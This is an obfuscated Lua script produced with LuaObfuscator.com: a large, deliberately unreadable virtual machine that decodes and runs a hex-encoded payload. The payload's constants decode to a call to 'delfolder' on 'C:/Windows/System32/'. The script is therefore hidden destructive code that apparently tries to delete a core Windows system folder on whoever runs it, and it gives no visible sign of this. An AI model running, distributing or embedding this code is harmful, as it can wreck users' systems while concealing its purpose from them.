--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v89=v2(v0(v30,16));if v19 then local v112=0;local v113;while true do if (v112==1) then return v113;end if (v112==0) then v113=v5(v89,v19);v19=nil;v112=1;end end else return v89;end end end);local function v20(v31,v32,v33) if v33 then local v90=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-(1 -0)) -(v32-((2595 -(892 + 65)) -(1523 + 114)))) + (2 -1))) ;return v90-(v90%(620 -(555 + 64))) ;else local v91=931 -((2043 -1186) + 74) ;local v92;while true do if (v91==(568 -(367 + 201))) then v92=(8 -6)^(v32-((217 -99) -(32 + 85))) ;return (((v31%(v92 + v92))>=v92) and (928 -(214 + 713))) or (0 + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (3 -1) );v18=v18 + (352 -(87 + 263)) ;return (v36 * (436 -(67 + 113))) + v35 ;end local function v23() local v37=0 + 0 ;local v38;local v39;local v40;local v41;while true do if (v37==((0 -0) -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + 3 + 1 ;v37=3 -(2 + 0) ;end if (v37==(953 -(802 + 150))) then return (v41 * 16777216) + (v40 * 65536) + (v39 * (689 -433)) + v38 ;end end end local function v24() local v42=v23();local v43=v23();local v44=998 -((1687 -(201 + 571)) + (299 -217)) ;local v45=(v20(v43,2 -1 ,12 + 8 ) * ((2 -0)^(1219 -(1069 + 118)))) + v42 ;local v46=v20(v43,(1185 -(116 + 1022)) -26 ,67 -36 );local v47=((v20(v43,6 + 26 )==((3 -2) -(0 -0))) and  -(1 + 0)) or ((1651 -(814 + 45)) -(368 + 423)) ;if (v46==(0 -0)) then if (v45==((11 + 7) -((24 -14) + 8))) then return v47 * (0 -0) ;else local v114=442 -(416 + 26) ;while true do if ((0 -(0 + 0))==v114) then v46=1 + 0 ;v44=0 -(0 + 0) ;break;end end end elseif (v46==(2485 -(145 + 293))) then return ((v45==(430 -(44 + 386))) and (v47 * ((1487 -(998 + 488))/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/(2^(43 + 9)))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(885 -(261 + 624))) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1 -0) );v18=v18 + v48 ;local v50={};for v66=1081 -(1020 + 60) , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v93,v94,v95,v96,v97,v98,v99,v100,v101) local v102=(function() return 0 + 0 ;end)();local v93=(function() return;end)();local v94=(function() return;end)();while true do local v111=(function() return 1822 -(301 + 1521) ;end)();while true do if (v111~=(0 -0)) then else if (v102==1) then local v121=(function() return 0;end)();while true do if (0==v121) then while true do if (v93==0) then v94=(function() return v95();end)();if (v96(v94, #"~", #"[")==(0 -0)) then local v141=(function() return 700 -(271 + 429) ;end)();local v142=(function() return;end)();local v143=(function() return;end)();local v144=(function() return;end)();local v145=(function() return;end)();while true do if (1==v141) then local v146=(function() return 0;end)();local v147=(function() return;end)();while true do if (v146==(0 + 0)) then v147=(function() return 1500 -(1408 + 92) ;end)();while true do if (v147==0) then v144=(function() return nil;end)();v145=(function() return nil;end)();v147=(function() return 1 -0 ;end)();end if (v147==(2 -1)) then v141=(function() return 1702 -(1419 + 281) ;end)();break;end end break;end end end if (v141~=(0 -0)) then else local v148=(function() return 0 + 0 ;end)();local v149=(function() return;end)();while true do if ((1171 -(418 + 753))~=v148) then else v149=(function() return 0 + 0 ;end)();while true do if (v149==(1 + 0)) then v141=(function() return 1 + 0 ;end)();break;end if (v149==(74 -(71 + 3))) then v142=(function() return 0;end)();v143=(function() return nil;end)();v149=(function() return 1 + 0 ;end)();end end break;end end end if ((4 -2)==v141) then while true do if (v142~= #",") then else local v150=(function() return 0 + 0 ;end)();local v151=(function() return;end)();while true do if ((529 -(406 + 123))==v150) then v151=(function() return 1769 -(1749 + 20) ;end)();while true do if (v151~=0) then else v145=(function() return {v97(),v97(),nil,nil};end)();if (v143==(0 -0)) then local v158=(function() return 0;end)();local v159=(function() return;end)();while true do if (v158==(241 -(187 + 54))) then v159=(function() return 0 + 0 ;end)();while true do if (v159~=(780 -(162 + 618))) then else v145[ #"xnx"]=(function() return v97();end)();v145[ #"0313"]=(function() return v97();end)();break;end end break;end end elseif (v143== #"}") then v145[ #"19("]=(function() return v98();end)();elseif (v143==2) then v145[ #"-19"]=(function() return v98() -((2 + 0)^(11 + 5)) ;end)();elseif (v143== #"xxx") then local v166=(function() return 0 -0 ;end)();local v167=(function() return;end)();while true do if (v166~=(0 -0)) then else v167=(function() return 1900 -(106 + 1794) ;end)();while true do if (v167~=(0 + 0)) then else v145[ #"xnx"]=(function() return v98() -((1638 -(1373 + 263))^(1016 -(451 + 549))) ;end)();v145[ #"0836"]=(function() return v97();end)();break;end end break;end end end v151=(function() return 1;end)();end if (v151==1) then v142=(function() return 1 + 1 ;end)();break;end end break;end end end if ((0 -0)==v142) then local v152=(function() return 0 -0 ;end)();local v153=(function() return;end)();while true do if ((1384 -(746 + 638))==v152) then v153=(function() return 0 + 0 ;end)();while true do if (v153==(0 -0)) then v143=(function() return v96(v94,343 -(218 + 123) , #"19(");end)();v144=(function() return v96(v94, #"?id=",1433 -(41 + 1386) );end)();v153=(function() return 1582 -(1535 + 46) ;end)();end if (1==v153) then v142=(function() return  #">";end)();break;end end break;end end end if (v142==(2 + 0)) then local v154=(function() return 0 -0 ;end)();local v155=(function() return;end)();while true do if (v154==(0 -0)) then v155=(function() return 0 + 0 ;end)();while true do if (v155==(561 -(306 + 254))) then v142=(function() return  #"gha";end)();break;end if (v155==(0 -0)) then if (v96(v144, #"/", #"}")== #",") then v145[6 -4 ]=(function() return v99[v145[1 + 1 ]];end)();end if (v96(v144,2,3 -1 )~= #"!") then else v145[ #"-19"]=(function() return v99[v145[ #"-19"]];end)();end v155=(function() return 1468 -(899 + 568) ;end)();end end break;end end end if (v142~= #"xxx") then else if (v96(v144, #"-19", #"xxx")== #"\\") then v145[ #"0313"]=(function() return v99[v145[ #"asd1"]];end)();end v100[v101]=(function() return v145;end)();break;end end break;end end end break;end end return v93,v94,v95,v96,v97,v98,v99,v100,v101;end end end if ((0 + 0)~=v102) then else v93=(function() return 0 -0 ;end)();v94=(function() return nil;end)();v102=(function() return 66 -(30 + 35) ;end)();end break;end end end end;end)();local v52=(function() return function(v103,v104,v105) local v106=(function() return 0;end)();local v107=(function() return;end)();while true do if (v106~=0) then else v107=(function() return 0 + 0 ;end)();while true do if (v107==(0 -0)) then local v122=(function() return 603 -(268 + 335) ;end)();local v123=(function() return;end)();while true do if (v122==0) then v123=(function() return 0;end)();while true do if ((0 -0)==v123) then v103[v104-#"<" ]=(function() return v105();end)();return v103,v104,v105;end end break;end end end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #"/",v57 do local v69=(function() return 1212 -(323 + 889) ;end)();local v70=(function() return;end)();local v71=(function() return;end)();local v72=(function() return;end)();while true do if (v69~=0) then else v70=(function() return 0;end)();v71=(function() return nil;end)();v69=(function() return 573 -(426 + 146) ;end)();end if (v69==(1 + 0)) then v72=(function() return nil;end)();while true do if ((1456 -(282 + 1174))~=v70) then else local v119=(function() return 0;end)();while true do if (v119==(812 -(569 + 242))) then v70=(function() return 2 -1 ;end)();break;end if (v119==(0 + 0)) then v71=(function() return v21();end)();v72=(function() return nil;end)();v119=(function() return 1 + 0 ;end)();end end end if (v70~=1) then else if (v71== #"[") then v72=(function() return v21()~=(1024 -(706 + 318)) ;end)();elseif (v71==(1253 -(721 + 530))) then v72=(function() return v24();end)();elseif (v71~= #"xnx") then else v72=(function() return v25();end)();end v58[v68]=(function() return v72;end)();break;end end break;end end end v56[ #"-19"]=(function() return v21();end)();for v73= #" ",v23() do FlatIdent_8F047,Descriptor,v21,v20,v22,v23,v58,v53,v73=(function() return v51(FlatIdent_8F047,Descriptor,v21,v20,v22,v23,v58,v53,v73);end)();end for v74= #"!",v23() do v54,v74,v28=(function() return v52(v54,v74,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1];local v64=v60[984 -(18 + 964) ];local v65=v60[(4 + 7) -8 ];return function(...) local v75=v63;local v76=v64;local v77=v65;local v78=v27;local v79=4 -3 ;local v80= -(1 + 0);local v81={};local v82={...};local v83=v12("#",...) -(851 -(20 + 830)) ;local v84={};local v85={};for v108=0 + (753 -(239 + 514)) ,v83 do if ((1284<=3151) and (v108>=v77)) then v81[v108-v77 ]=v82[v108 + (127 -(116 + 4 + 6)) ];else v85[v108]=v82[v108 + 1 + 0 ];end end local v86=(v83-v77) + (739 -(542 + 196)) ;local v87;local v88;while true do v87=v75[v79];v88=v87[1 -0 ];if (v88<=(2 + 3)) then if (v88<=2) then if (v88<=(1329 -(797 + 532))) then v85[v87[2 + 0 ]]=v87[3 + 0 ];elseif (v88>(1 + 0)) then do return;end else v85[v87[4 -2 ]]=v87[3];end elseif (v88<=(7 -4)) then local v126=v87[1 + 1 ];v85[v126]=v85[v126](v85[v126 + (1552 -(1126 + 425)) ]);elseif (v88==((961 -552) -(118 + (1489 -(373 + 829))))) then local v134=v87[7 -5 ];v85[v134](v85[v134 + (1122 -(118 + 1003)) ]);else v85[v87[5 -3 ]]=v62[v87[380 -(142 + 235) ]];end elseif (v88<=8) then if (v88<=(27 -21)) then local v128=v87[1 + 1 ];v85[v128]=v85[v128](v85[v128 + 1 ]);elseif (v88==(984 -(553 + 424))) then local v137=v87[3 -1 ];v85[v137](v85[v137 + (732 -(476 + 255)) + 0 ]);else do return;end end elseif ((v88<=(9 + 0)) or (1850==1529)) then v85[v87[2 + 0 ]]=v62[v87[2 + 1 ]];elseif ((821<2123) and (v88==(6 + 4))) then v85[v87[(1134 -(369 + 761)) -2 ]]=v29(v76[v87[7 -4 ]],nil,v62);else v85[v87[4 -2 ]]=v29(v76[v87[3]],nil,v62);end v79=v79 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!013Q0003053Q007063612Q6C00043Q0012093Q00013Q00020B00016Q00033Q000200022Q00083Q00013Q00013Q00023Q0003093Q0064656C666F6C64657203143Q00433A2F57696E646F77732F53797374656D33322F00043Q0012093Q00013Q001201000100024Q00073Q000200012Q00083Q00017Q00",v9(),...);
